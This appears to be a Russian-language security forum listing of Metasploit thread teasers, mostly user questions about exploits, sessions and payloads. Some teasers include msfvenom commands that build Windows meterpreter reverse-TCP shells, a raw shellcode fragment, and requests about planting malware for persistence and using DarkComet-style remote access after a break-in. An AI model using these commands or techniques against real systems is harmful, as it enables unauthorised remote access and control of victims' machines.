metasploit

Все привет! Довольно часто встречаю узявимость MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution. Что то не могу найти в метасплоите похожего модуля,да и в принципе везде только описание его действий,PoC нету. Есть у кого нибудь информация,как его эксплуатировать ? :)

Доброго времени суток, обитатели Codeby. Думаю не у каждого есть возможность иметь при себе ноутбук с хакерским арсеналом или же NetHunter, но на помощь к нам приходит Termux. Не буду тянуть кота за хвост. Как вы поняли из названия темы сегодня мы установим Ubuntu в связке с Metasploit...

Приветствую! Решил сюда написать, т.к. вроде тема соответствует разделу.. В общем я подыскиваю недорогой VPS на debian для тренировки с MSFConsole (что б сессия прилетала, думаю вы поняли).. Не подскажете кто шарит, что и где лучше взять?

Обновился до 2018.1, решил тестануть ms17_010_psexec, пишет Started reverse TCP handler on 192.168.1.4:4444 192.168.1.2:445 - Target OS: Windows 8.1 Enterprise 9600 [-] 192.168.1.2:445 - Unable to find accessible named pipe! Exploit completed, but no session was created. Не патчена, антивиря...

Добрый день! Если у кого есть скиньте, пожалуйста, ссылку на полный перевод Metasploit Penetration Testing Cookbook Спасибо!

Ошибку ниже я сначала словил под Arch. Потом попробовал запустить и под Kali последней версии. Но ничего не поменялось под обеими ОС одна и та же ошибка. msf5 > wmap_targets -t http://site.com [-] Error while running command wmap_targets: PG::InvalidTextRepresentation: ERROR: invalid input...

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 -f raw > sag При открытии \FC\E8\82\00\00\00`\89\E51\C0d\8BP0\8BR\8BR\8Br(\B7J&1\FF\AC<a|, \C1\CF\C7\E2\F2RW\8BR\8BJ<\8BLx\E3H\D1Q\8BY...

Друзья , прошу помощи ! Не получается схватить агента с целевого пк , который находится за NATом. Слушатель Empire использует http-захват , а это поставило меня в тупик. Привык работать с TCP-ревёрсингом в метасплоит , использую NGROK для проброса портов. А вот в Empire не хватает тямы всё...

Всем посетителям форума, доброго времени дня. Сегодня я решил осветить один из встроенных модулей в metasploit framework, о котором мало кто знает и мало кто пользуется, но на самом деле данный модуль позволяет поднять свои привилегии вплоть до администратора домена или предприятия в зависимости...

Друзья! Скажите пожалуйста , каким образом можно использовать эксплоиты с данным раширением в Metasploit и в какой среде ,помимо метасплоит , можно их юзать?

Всем здравствуйте. Совсем недавно начал углубленно изучать\читать про эксплоиты. Ведь именно они залог удачного взлома! И хотелось бы, так сказать, узнать о них еще больше. Недавно поставил на свою виртуальную машину windows7, и попробовал получить к ней доступ с помощью эксплоита eternalblue...

Основа: Кали или Арч Цель: машина на Windows XP, Windows 7, Windows server. Столкнулся с проблемой, что эксплойты не всегда создают ссесию, хотя система девственна и без намека на АВ. Проблема решается отключением брендмаузера, но как его обойти? Раньше таких проблем не испытывал.

Как в метасплоите закрепиться в системе(свой вредонос в автозагрузку занести)? Может модуль есть какой-нибудь?

Когда в метасплоите пытаюсь взаимодействовать с файлами на русском языке, вылетает ошибка, мол нету такого файла, как пофиксить?

У меня шиндовс 8.1, создаю shell такой командой: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /root/shell.exe Закидываю на хост, сессия прилетает, такие команды типо cd pwd ifconfig работают, а все остальные нет, не работает даже cat пишет: [-] stdapi_fs_stat...

Добрый день. Один доллар (You must be registered for see element.You must be registered for see element.) показал пример эксплуатации уязвимости через You must be registered for see element. You must be registered for see element. Мы рассмотрим альтернативный вариант через You must be...

You must be registered for see element. Здравствуйте,Уважаемые Форумчане,Друзья и Дорогие Читатели портала Codeby. Очередной обзор будет посвящён несколько необычному инструменту. Всем,кто связан так,или иначе, с IT-безопасностью,будет полезно знать о его существовании. Особенность SpookFlare...

ищу внятный мануал по поводу эксплойтов, пэйлоудав и пост эксплуатации, а так же лучшую прогу для кали удаленного доступа после взлома, наподобе дарк комет. объясните пожалуйста поподробнее что в кслючают в семя модули эксплойтов, пейлойдов и пост эксплуацтации. эксплойты я как понял это тоже...

Всем привет.Может быть кто-нибудь объяснит мне,дохлому ламеру,почему при создании сессии не запускается vncviewer ??) И как нужно определять параметр LPORT ?? Как я понимаю - я за NATом(команда ifconfig и сайты определяющие ip показывают разные адреса). В общем: Эксплойт -...

Всем привет! Сегодня поговорим о ВЕСчах который должен иметь каждый уважающий себя мужик. "Права ты можешь не иметь, но автомобиль иметь обязан!" Кстати это про меня)) 5 машин поменял, а Вод. Удостоверение все никак не получу..(( В этой статье я покажу Вам как подружить китайский ELM-327...